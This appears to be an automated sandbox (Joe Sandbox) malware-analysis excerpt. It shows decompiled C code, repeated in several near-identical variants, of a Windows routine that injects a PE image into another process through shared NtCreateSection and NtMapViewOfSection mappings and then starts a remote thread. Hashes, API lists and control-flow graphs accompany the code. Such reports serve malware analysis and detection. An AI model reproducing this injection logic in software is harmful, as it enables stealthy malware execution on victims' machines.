                                                          									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                                                          										_t165 = _t164 + 0xf8;
                                                          										__eflags = _t165;
                                                          									} else {
                                                          										_t165 = _t164 + 0x108;
                                                          									}
                                                          									_push(_t139);
                                                          									_t140 =  *(_t165 + 0x10);
                                                          									if(_t140 != 0) {
                                                          										memcpy( *((intOrPtr*)(_t165 + 0xc)) +  *(_t203 - 0x48),  *((intOrPtr*)(_t165 + 0x14)) +  *((intOrPtr*)(_t203 + 0xc)), _t140);
                                                          										_t207 = _t207 + 0xc;
                                                          									}
                                                          									asm("loop 0xffffffe6");
                                                          									_pop(_t195);
                                                          									_t232 =  *((intOrPtr*)(_t203 - 0x34));
                                                          									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                                                          										_push(_t195);
                                                          										_t168 =  *((intOrPtr*)(_t195 + 0x34)) -  *(_t203 - 0x40);
                                                          										_t198 =  *((intOrPtr*)(_t195 + 0xa0)) +  *(_t203 - 0x48);
                                                          										__eflags = _t198;
                                                          										while(1) {
                                                          											__eflags =  *_t198;
                                                          											if( *_t198 == 0) {
                                                          												break;
                                                          											}
                                                          											_t178 =  *_t198;
                                                          											_t198 = _t198 + 8;
                                                          											asm("lodsw");
                                                          											__eflags = 0;
                                                          											if(0 != 0) {
                                                          												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t168;
                                                          												__eflags =  *((intOrPtr*)(0 +  *(_t203 - 0x48) + _t178));
                                                          											}
                                                          											asm("loop 0xffffffe9");
                                                          										}
                                                          										_pop(_t199);
                                                          										_t176 = 0;
                                                          										__eflags = 0;
                                                          										_t108 = _t203 - 4;
                                                          										 *_t108 = 0;
                                                          										 *((intOrPtr*)(_t128 + 0x98))( *(_t203 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t199 + 0x28)) +  *(_t203 - 0x40),  *(_t203 - 0x3c), _t108, 0);
                                                          									} else {
                                                          										L53();
                                                          										_pop(_t179);
                                                          										_t176 = _t179 - 0x1760;
                                                          										 *((intOrPtr*)(_t176 + 0x1794)) = _t176 + 0x2c17;
                                                          										L00401227(_t128, _t176, _t232, _t176 + 0x2c17, 0x1ad);
                                                          										0x33();
                                                          										 *((intOrPtr*)(_t176 + 0x17b9)) = _t176 + 0x2c67;
                                                          										0x33();
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t91 = 0x14e3;
                                                          				_push(0x37f);
                                                          				_t131 =  *_t207;
                                                          				return L0040119E(_t91, _t131, _t176, _t232);
                                                          			}
                                                          0x004015f5
                                                          0x0040160a
                                                          0x0040161d
                                                          0x00401620
                                                          0x00401623
                                                          0x0040163b
                                                          0x00401641
                                                          0x00401644
                                                          0x0040165b
                                                          0x0040165d
                                                          0x00401663
                                                          0x00401668
                                                          0x00401668
                                                          0x00401672
                                                          0x00401699
                                                          0x004016a1
                                                          0x004016c5
                                                          0x004016c6
                                                          0x004016c9
                                                          0x004016e1
                                                          0x004016f0
                                                          0x004016f8
                                                          0x004016fd
                                                          0x00401706
                                                          0x0040170f
                                                          0x0040171b
                                                          0x0040171d
                                                          0x00401721
                                                          0x00401722
                                                          0x00401728
                                                          0x00401732
                                                          0x00401732
                                                          0x0040172a
                                                          0x0040172a
                                                          0x0040172a
                                                          0x00401738
                                                          0x00401739
                                                          0x0040173e
                                                          0x0040174c
                                                          0x0040174c
                                                          0x0040174c
                                                          0x00401752
                                                          0x00401754
                                                          0x00401755
                                                          0x00401759
                                                          0x004017c1
                                                          0x004017c5
                                                          0x004017d0
                                                          0x004017d0
                                                          0x004017d3
                                                          0x004017d3
                                                          0x004017d6
                                                          0x00000000
                                                          0x00000000
                                                          0x004017d8
                                                          0x004017e2
                                                          0x004017e7
                                                          0x004017e9
                                                          0x004017ee
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fc
                                                          0x004017fc
                                                          0x00401800
                                                          0x00401807
                                                          0x00401807
                                                          0x00401809
                                                          0x0040180c
                                                          0x0040181c
                                                          0x0040175b
                                                          0x0040175b
                                                          0x00401760
                                                          0x00401761
                                                          0x00401777
                                                          0x00401786
                                                          0x00401793
                                                          0x004017aa
                                                          0x004017b8
                                                          0x004017b8
                                                          0x00401759
                                                          0x0040165d
                                                          0x0040163b
                                                          0x0040160a
                                                          0x00401541
                                                          0x0040183d
                                                          0x0040184b
                                                          0x00401850
                                                          0x00401866

                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: 6e59b7e5303ef17d3f4c775c21a888ce17b01420e14e5236be6b7b92dd2dae58
                                                          • Instruction ID: 39cbb5cf0de6fd42451f7104dd6b59036266353996c087b5e70b14ffae25b97f
                                                          • Opcode Fuzzy Hash: 6e59b7e5303ef17d3f4c775c21a888ce17b01420e14e5236be6b7b92dd2dae58
                                                          • Instruction Fuzzy Hash: 29512971900245BFEB219F91CC49FEF7BB9EF85B00F10412AFA11AA2A5D7709941CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 240 4014bf-4014c4 244 4014db 240->244 245 4014cc-4014f1 call 40119e 240->245 244->245 249 4014f3 245->249 250 4014f6-4014fb 245->250 249->250 252 401501-401512 250->252 253 401824-40182c 250->253 257 401822 252->257 258 401518-401541 252->258 253->250 256 401831-401842 253->256 260 401845-401866 call 40119e 256->260 261 401838-40183e 256->261 257->256 258->257 268 401547-40155e NtDuplicateObject 258->268 261->260 268->257 270 401564-401588 NtCreateSection 268->270 272 4015e4-40160a NtCreateSection 270->272 273 40158a-4015ab NtMapViewOfSection 270->273 272->257 275 401610-401614 272->275 273->272 274 4015ad-4015c9 NtMapViewOfSection 273->274 274->272 276 4015cb-4015e1 274->276 275->257 277 40161a-40163b NtMapViewOfSection 275->277 276->272 277->257 278 401641-40165d NtMapViewOfSection 277->278 278->257 280 401663 call 401668 278->280
                                                          C-Code - Quality: 62%
                                                          			E004014BF(void* __ebx, void* __edi, void* __eflags) {
                                                          				void* _t84;
                                                          				intOrPtr _t87;
                                                          				long _t90;
                                                          				void* _t91;
                                                          				struct _GUID _t98;
                                                          				struct _GUID _t100;
                                                          				PVOID* _t102;
                                                          				PVOID* _t104;
                                                          				intOrPtr _t106;
                                                          				intOrPtr* _t108;
                                                          				PVOID* _t121;
                                                          				PVOID* _t123;
                                                          				intOrPtr _t128;
                                                          				intOrPtr _t130;
                                                          				intOrPtr _t131;
                                                          				long* _t132;
                                                          				signed int _t139;
                                                          				int _t140;
                                                          				signed int _t159;
                                                          				signed int _t160;
                                                          				signed int _t161;
                                                          				void* _t162;
                                                          				intOrPtr* _t163;
                                                          				void* _t166;
                                                          				long _t174;
                                                          				intOrPtr _t176;
                                                          				void* _t177;
                                                          				long* _t183;
                                                          				intOrPtr* _t185;
                                                          				HANDLE* _t186;
                                                          				HANDLE* _t187;
                                                          				void* _t192;
                                                          				void* _t193;
                                                          				intOrPtr* _t196;
                                                          				void* _t197;
                                                          				void* _t200;
                                                          				void* _t201;
                                                          				intOrPtr* _t203;
                                                          				intOrPtr* _t204;
                                                          				void* _t207;
                                                          				intOrPtr* _t208;
                                                          				void* _t209;
                                                          				long _t224;
                                                          
                                                          				asm("invalid");
                                                          				_t84 = 0x14e3;
                                                          				_push(0x37f);
                                                          				_t130 =  *_t203;
                                                          				_t204 = _t203 + 4;
                                                          				L0040119E(_t84, _t130, __edi, __eflags);
                                                          				_t128 =  *((intOrPtr*)(_t201 + 8));
                                                          				_t174 = 0;
                                                          				 *((intOrPtr*)(_t201 - 0x34)) = 0;
                                                          				if(gs != 0) {
                                                          					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
                                                          				}
                                                          				while(1) {
                                                          					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
                                                          					if(_t87 != 0) {
                                                          						break;
                                                          					}
                                                          					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                          				}
                                                          				 *((intOrPtr*)(_t201 - 0x5c)) = _t87;
                                                          				_t183 = _t201 - 0x60;
                                                          				 *_t183 = _t174;
                                                          				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t183);
                                                          				_t90 =  *_t183;
                                                          				if(_t90 != 0) {
                                                          					_t132 = _t201 - 0x30;
                                                          					 *_t132 = _t90;
                                                          					_t132[1] = _t174;
                                                          					_t185 = _t201 - 0x28;
                                                          					 *((intOrPtr*)(_t128 + 0x10))(_t185, 0x18);
                                                          					 *_t185 = 0x18;
                                                          					_push(_t201 - 0x30);
                                                          					_push(_t185);
                                                          					_push(0x40);
                                                          					_push(_t201 - 0x10);
                                                          					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, _t174, _t174, 2) == 0) {
                                                          						 *(_t201 - 8) = _t174;
                                                          						_t98 = _t201 - 0x50;
                                                          						 *(_t98 + 4) = _t174;
                                                          						 *_t98 = 0x5000;
                                                          						_t186 = _t201 - 0x54;
                                                          						if(NtCreateSection(_t186, 6, _t174, _t98, 4, 0x8000000, _t174) == 0) {
                                                          							 *_t25 =  *(_t201 - 0x50);
                                                          							_t121 = _t201 - 0x44;
                                                          							 *_t121 = _t174;
                                                          							if(NtMapViewOfSection( *_t186, 0xffffffff, _t121, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                                                          								_t123 = _t201 - 0x3c;
                                                          								 *_t123 = _t174;
                                                          								if(NtMapViewOfSection( *_t186,  *(_t201 - 0xc), _t123, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                                                          									_t200 =  *(_t201 - 0x44);
                                                          									 *((intOrPtr*)(_t128 + 0x20))(_t174, _t200, 0x104);
                                                          									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
                                                          									 *(_t201 - 8) =  *(_t201 - 8) + 1;
                                                          								}
                                                          							}
                                                          						}
                                                          						_t100 = _t201 - 0x50;
                                                          						 *(_t100 + 4) = _t174;
                                                          						 *_t100 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
                                                          						_t187 = _t201 - 0x58;
                                                          						if(NtCreateSection(_t187, 0xe, _t174, _t100, 0x40, 0x8000000, _t174) == 0 &&  *(_t201 - 8) != 0) {
                                                          							 *_t46 =  *(_t201 - 0x50);
                                                          							_t102 = _t201 - 0x48;
                                                          							 *_t102 = _t174;
                                                          							if(NtMapViewOfSection( *_t187, 0xffffffff, _t102, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                                                          								_t104 = _t201 - 0x40;
                                                          								 *_t104 = _t174;
                                                          								_t224 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t104, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 0x20);
                                                          								if(_t224 == 0) {
                                                          									L21();
                                                          									if(_t224 == 0 && _t224 != 0) {
                                                          									}
                                                          									_t207 = _t204 + 4;
                                                          									_push(0x2e62);
                                                          									_t208 = _t207 + 4;
                                                          									_push(0x2260);
                                                          									_t106 =  *_t208;
                                                          									_t209 = _t208 + 4;
                                                          									_t159 = (0x2260 << 5) + _t106;
                                                          									asm("lodsb");
                                                          									_t160 = _t159;
                                                          									asm("loop 0xffffffc2");
                                                          									_t161 = _t160 ^ 0xbcc951dd;
                                                          									_t204 = _t209 - _t161;
                                                          									_t192 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
                                                          									_t139 =  *(_t192 + 6) & 0x0000ffff;
                                                          									_push(_t192);
                                                          									_t162 = _t192;
                                                          									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                                                          										_t163 = _t162 + 0xf8;
                                                          										__eflags = _t163;
                                                          									} else {
                                                          										_t163 = _t162 + 0x108;
                                                          									}
                                                          									_push(_t139);
                                                          									_t140 =  *(_t163 + 0x10);
                                                          									if(_t140 != 0) {
                                                          										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t140);
                                                          										_t204 = _t204 + 0xc;
                                                          									}
                                                          									asm("loop 0xffffffe6");
                                                          									_pop(_t193);
                                                          									_t229 =  *((intOrPtr*)(_t201 - 0x34));
                                                          									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                                                          										_push(_t193);
                                                          										_t166 =  *((intOrPtr*)(_t193 + 0x34)) -  *(_t201 - 0x40);
                                                          										_t196 =  *((intOrPtr*)(_t193 + 0xa0)) +  *(_t201 - 0x48);
                                                          										__eflags = _t196;
                                                          										while(1) {
                                                          											__eflags =  *_t196;
                                                          											if( *_t196 == 0) {
                                                          												break;
                                                          											}
                                                          											_t176 =  *_t196;
                                                          											_t196 = _t196 + 8;
                                                          											asm("lodsw");
                                                          											__eflags = 0;
                                                          											if(0 != 0) {
                                                          												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
                                                          												__eflags =  *((intOrPtr*)(0 +  *(_t201 - 0x48) + _t176));
                                                          											}
                                                          											asm("loop 0xffffffe9");
                                                          										}
                                                          										_pop(_t197);
                                                          										_t174 = 0;
                                                          										__eflags = 0;
                                                          										_t108 = _t201 - 4;
                                                          										 *_t108 = 0;
                                                          										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t197 + 0x28)) +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t108, 0);
                                                          									} else {
                                                          										L54();
                                                          										_pop(_t177);
                                                          										_t174 = _t177 - 0x1760;
                                                          										 *((intOrPtr*)(_t174 + 0x1794)) = _t174 + 0x2c17;
                                                          										L00401227(_t128, _t174, _t229, _t174 + 0x2c17, 0x1ad);
                                                          										0x33();
                                                          										 *((intOrPtr*)(_t174 + 0x17b9)) = _t174 + 0x2c67;
                                                          										0x33();
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t91 = 0x14e3;
                                                          				_push(0x37f);
                                                          				_t131 =  *_t204;
                                                          				return L0040119E(_t91, _t131, _t174, _t229);
                                                          			}

                                                          0x0040165d
                                                          0x00401663
                                                          0x00401668
                                                          0x00401668
                                                          0x00401672
                                                          0x00401699
                                                          0x004016a1
                                                          0x004016c5
                                                          0x004016c6
                                                          0x004016c9
                                                          0x004016e1
                                                          0x004016f0
                                                          0x004016f8
                                                          0x004016fd
                                                          0x00401706
                                                          0x0040170f
                                                          0x0040171b
                                                          0x0040171d
                                                          0x00401721
                                                          0x00401722
                                                          0x00401728
                                                          0x00401732
                                                          0x00401732
                                                          0x0040172a
                                                          0x0040172a
                                                          0x0040172a
                                                          0x00401738
                                                          0x00401739
                                                          0x0040173e
                                                          0x0040174c
                                                          0x0040174c
                                                          0x0040174c
                                                          0x00401752
                                                          0x00401754
                                                          0x00401755
                                                          0x00401759
                                                          0x004017c1
                                                          0x004017c5
                                                          0x004017d0
                                                          0x004017d0
                                                          0x004017d3
                                                          0x004017d3
                                                          0x004017d6
                                                          0x00000000
                                                          0x00000000
                                                          0x004017d8
                                                          0x004017e2
                                                          0x004017e7
                                                          0x004017e9
                                                          0x004017ee
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fc
                                                          0x004017fc
                                                          0x00401800
                                                          0x00401807
                                                          0x00401807
                                                          0x00401809
                                                          0x0040180c
                                                          0x0040181c
                                                          0x0040175b
                                                          0x0040175b
                                                          0x00401760
                                                          0x00401761
                                                          0x00401777
                                                          0x00401786
                                                          0x00401793
                                                          0x004017aa
                                                          0x004017b8
                                                          0x004017b8
                                                          0x00401759
                                                          0x0040165d
                                                          0x0040163b
                                                          0x0040160a
                                                          0x00401541
                                                          0x0040183d
                                                          0x0040184b
                                                          0x00401850
                                                          0x00401866

                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: d6868da5ad0cc6704b0b456fa49984c9b80f10e5cd5d9e7629ddc67eaa61c955
                                                          • Instruction ID: 07d304ea65bb56911e0060c1c25482d61d12f4ba10f26ae25195bb01424c625b
                                                          • Opcode Fuzzy Hash: d6868da5ad0cc6704b0b456fa49984c9b80f10e5cd5d9e7629ddc67eaa61c955
                                                          • Instruction Fuzzy Hash: 345106B1900245BFEB219F91CC48FEBBBB9EF85B10F104129FA11AA2E5D7749941CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 282 4014da-4014f1 call 40119e 288 4014f3 282->288 289 4014f6-4014fb 282->289 288->289 291 401501-401512 289->291 292 401824-40182c 289->292 296 401822 291->296 297 401518-401541 291->297 292->289 295 401831-401842 292->295 299 401845-401866 call 40119e 295->299 300 401838-40183e 295->300 296->295 297->296 307 401547-40155e NtDuplicateObject 297->307 300->299 307->296 309 401564-401588 NtCreateSection 307->309 311 4015e4-40160a NtCreateSection 309->311 312 40158a-4015ab NtMapViewOfSection 309->312 311->296 314 401610-401614 311->314 312->311 313 4015ad-4015c9 NtMapViewOfSection 312->313 313->311 315 4015cb-4015e1 313->315 314->296 316 40161a-40163b NtMapViewOfSection 314->316 315->311 316->296 317 401641-40165d NtMapViewOfSection 316->317 317->296 319 401663 call 401668 317->319
                                                          C-Code - Quality: 62%
                                                          			E004014DA(void* __ebx, void* __edi, void* __eflags) {
                                                          				void* _t84;
                                                          				intOrPtr _t87;
                                                          				long _t90;
                                                          				void* _t91;
                                                          				struct _GUID _t98;
                                                          				struct _GUID _t100;
                                                          				PVOID* _t102;
                                                          				PVOID* _t104;
                                                          				intOrPtr _t106;
                                                          				intOrPtr* _t108;
                                                          				PVOID* _t121;
                                                          				PVOID* _t123;
                                                          				intOrPtr _t128;
                                                          				intOrPtr _t130;
                                                          				intOrPtr _t131;
                                                          				long* _t132;
                                                          				signed int _t139;
                                                          				int _t140;
                                                          				signed int _t159;
                                                          				signed int _t160;
                                                          				signed int _t161;
                                                          				void* _t162;
                                                          				intOrPtr* _t163;
                                                          				void* _t166;
                                                          				long _t174;
                                                          				intOrPtr _t176;
                                                          				void* _t177;
                                                          				long* _t183;
                                                          				intOrPtr* _t185;
                                                          				HANDLE* _t186;
                                                          				HANDLE* _t187;
                                                          				void* _t192;
                                                          				void* _t193;
                                                          				intOrPtr* _t196;
                                                          				void* _t197;
                                                          				void* _t200;
                                                          				void* _t201;
                                                          				intOrPtr* _t203;
                                                          				intOrPtr* _t204;
                                                          				void* _t207;
                                                          				intOrPtr* _t208;
                                                          				void* _t209;
                                                          				long _t224;
                                                          
                                                          				_pop(_t84);
                                                          				_push(0x37f);
                                                          				_t130 =  *_t203;
                                                          				_t204 = _t203 + 4;
                                                          				L0040119E(_t84, _t130, __edi, __eflags);
                                                          				_t128 =  *((intOrPtr*)(_t201 + 8));
                                                          				_t174 = 0;
                                                          				 *((intOrPtr*)(_t201 - 0x34)) = 0;
                                                          				if(gs != 0) {
                                                          					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
                                                          				}
                                                          				while(1) {
                                                          					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
                                                          					if(_t87 != 0) {
                                                          						break;
                                                          					}
                                                          					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                          				}
                                                          				 *((intOrPtr*)(_t201 - 0x5c)) = _t87;
                                                          				_t183 = _t201 - 0x60;
                                                          				 *_t183 = _t174;
                                                          				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t183);
                                                          				_t90 =  *_t183;
                                                          				if(_t90 != 0) {
                                                          					_t132 = _t201 - 0x30;
                                                          					 *_t132 = _t90;
                                                          					_t132[1] = _t174;
                                                          					_t185 = _t201 - 0x28;
                                                          					 *((intOrPtr*)(_t128 + 0x10))(_t185, 0x18);
                                                          					 *_t185 = 0x18;
                                                          					_push(_t201 - 0x30);
                                                          					_push(_t185);
                                                          					_push(0x40);
                                                          					_push(_t201 - 0x10);
                                                          					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, _t174, _t174, 2) == 0) {
                                                          						 *(_t201 - 8) = _t174;
                                                          						_t98 = _t201 - 0x50;
                                                          						 *(_t98 + 4) = _t174;
                                                          						 *_t98 = 0x5000;
                                                          						_t186 = _t201 - 0x54;
                                                          						if(NtCreateSection(_t186, 6, _t174, _t98, 4, 0x8000000, _t174) == 0) {
                                                          							 *_t25 =  *(_t201 - 0x50);
                                                          							_t121 = _t201 - 0x44;
                                                          							 *_t121 = _t174;
                                                          							if(NtMapViewOfSection( *_t186, 0xffffffff, _t121, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                                                          								_t123 = _t201 - 0x3c;
                                                          								 *_t123 = _t174;
                                                          								if(NtMapViewOfSection( *_t186,  *(_t201 - 0xc), _t123, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                                                          									_t200 =  *(_t201 - 0x44);
                                                          									 *((intOrPtr*)(_t128 + 0x20))(_t174, _t200, 0x104);
                                                          									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
                                                          									 *(_t201 - 8) =  *(_t201 - 8) + 1;
                                                          								}
                                                          							}
                                                          						}
                                                          						_t100 = _t201 - 0x50;
                                                          						 *(_t100 + 4) = _t174;
                                                          						 *_t100 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
                                                          						_t187 = _t201 - 0x58;
                                                          						if(NtCreateSection(_t187, 0xe, _t174, _t100, 0x40, 0x8000000, _t174) == 0 &&  *(_t201 - 8) != 0) {
                                                          							 *_t46 =  *(_t201 - 0x50);
                                                          							_t102 = _t201 - 0x48;
                                                          							 *_t102 = _t174;
                                                          							if(NtMapViewOfSection( *_t187, 0xffffffff, _t102, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                                                          								_t104 = _t201 - 0x40;
                                                          								 *_t104 = _t174;
                                                          								_t224 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t104, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 0x20);
                                                          								if(_t224 == 0) {
                                                          									L18();
                                                          									if(_t224 == 0 && _t224 != 0) {
                                                          									}
                                                          									_t207 = _t204 + 4;
                                                          									_push(0x2e62);
                                                          									_t208 = _t207 + 4;
                                                          									_push(0x2260);
                                                          									_t106 =  *_t208;
                                                          									_t209 = _t208 + 4;
                                                          									_t159 = (0x2260 << 5) + _t106;
                                                          									asm("lodsb");
                                                          									_t160 = _t159;
                                                          									asm("loop 0xffffffc2");
                                                          									_t161 = _t160 ^ 0xbcc951dd;
                                                          									_t204 = _t209 - _t161;
                                                          									_t192 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
                                                          									_t139 =  *(_t192 + 6) & 0x0000ffff;
                                                          									_push(_t192);
                                                          									_t162 = _t192;
                                                          									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                                                          										_t163 = _t162 + 0xf8;
                                                          										__eflags = _t163;
                                                          									} else {
                                                          										_t163 = _t162 + 0x108;
                                                          									}
                                                          									_push(_t139);
                                                          									_t140 =  *(_t163 + 0x10);
                                                          									if(_t140 != 0) {
                                                          										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t140);
                                                          										_t204 = _t204 + 0xc;
                                                          									}
                                                          									asm("loop 0xffffffe6");
                                                          									_pop(_t193);
                                                          									_t229 =  *((intOrPtr*)(_t201 - 0x34));
                                                          									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                                                          										_push(_t193);
                                                          										_t166 =  *((intOrPtr*)(_t193 + 0x34)) -  *(_t201 - 0x40);
                                                          										_t196 =  *((intOrPtr*)(_t193 + 0xa0)) +  *(_t201 - 0x48);
                                                          										__eflags = _t196;
                                                          										while(1) {
                                                          											__eflags =  *_t196;
                                                          											if( *_t196 == 0) {
                                                          												break;
                                                          											}
                                                          											_t176 =  *_t196;
                                                          											_t196 = _t196 + 8;
                                                          											asm("lodsw");
                                                          											__eflags = 0;
                                                          											if(0 != 0) {
                                                          												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
                                                          												__eflags =  *((intOrPtr*)(0 +  *(_t201 - 0x48) + _t176));
                                                          											}
                                                          											asm("loop 0xffffffe9");
                                                          										}
                                                          										_pop(_t197);
                                                          										_t174 = 0;
                                                          										__eflags = 0;
                                                          										_t108 = _t201 - 4;
                                                          										 *_t108 = 0;
                                                          										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t197 + 0x28)) +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t108, 0);
                                                          									} else {
                                                          										L51();
                                                          										_pop(_t177);
                                                          										_t174 = _t177 - 0x1760;
                                                          										 *((intOrPtr*)(_t174 + 0x1794)) = _t174 + 0x2c17;
                                                          										L00401227(_t128, _t174, _t229, _t174 + 0x2c17, 0x1ad);
                                                          										0x33();
                                                          										 *((intOrPtr*)(_t174 + 0x17b9)) = _t174 + 0x2c67;
                                                          										0x33();
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t91 = 0x14e3;
                                                          				_push(0x37f);
                                                          				_t131 =  *_t204;
                                                          				return L0040119E(_t91, _t131, _t174, _t229);
                                                          			}
                                                          0x004016f8
                                                          0x004016fd
                                                          0x00401706
                                                          0x0040170f
                                                          0x0040171b
                                                          0x0040171d
                                                          0x00401721
                                                          0x00401722
                                                          0x00401728
                                                          0x00401732
                                                          0x00401732
                                                          0x0040172a
                                                          0x0040172a
                                                          0x0040172a
                                                          0x00401738
                                                          0x00401739
                                                          0x0040173e
                                                          0x0040174c
                                                          0x0040174c
                                                          0x0040174c
                                                          0x00401752
                                                          0x00401754
                                                          0x00401755
                                                          0x00401759
                                                          0x004017c1
                                                          0x004017c5
                                                          0x004017d0
                                                          0x004017d0
                                                          0x004017d3
                                                          0x004017d3
                                                          0x004017d6
                                                          0x00000000
                                                          0x00000000
                                                          0x004017d8
                                                          0x004017e2
                                                          0x004017e7
                                                          0x004017e9
                                                          0x004017ee
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fc
                                                          0x004017fc
                                                          0x00401800
                                                          0x00401807
                                                          0x00401807
                                                          0x00401809
                                                          0x0040180c
                                                          0x0040181c
                                                          0x0040175b
                                                          0x0040175b
                                                          0x00401760
                                                          0x00401761
                                                          0x00401777
                                                          0x00401786
                                                          0x00401793
                                                          0x004017aa
                                                          0x004017b8
                                                          0x004017b8
                                                          0x00401759
                                                          0x0040165d
                                                          0x0040163b
                                                          0x0040160a
                                                          0x00401541
                                                          0x0040183d
                                                          0x0040184b
                                                          0x00401850
                                                          0x00401866

                                                          APIs
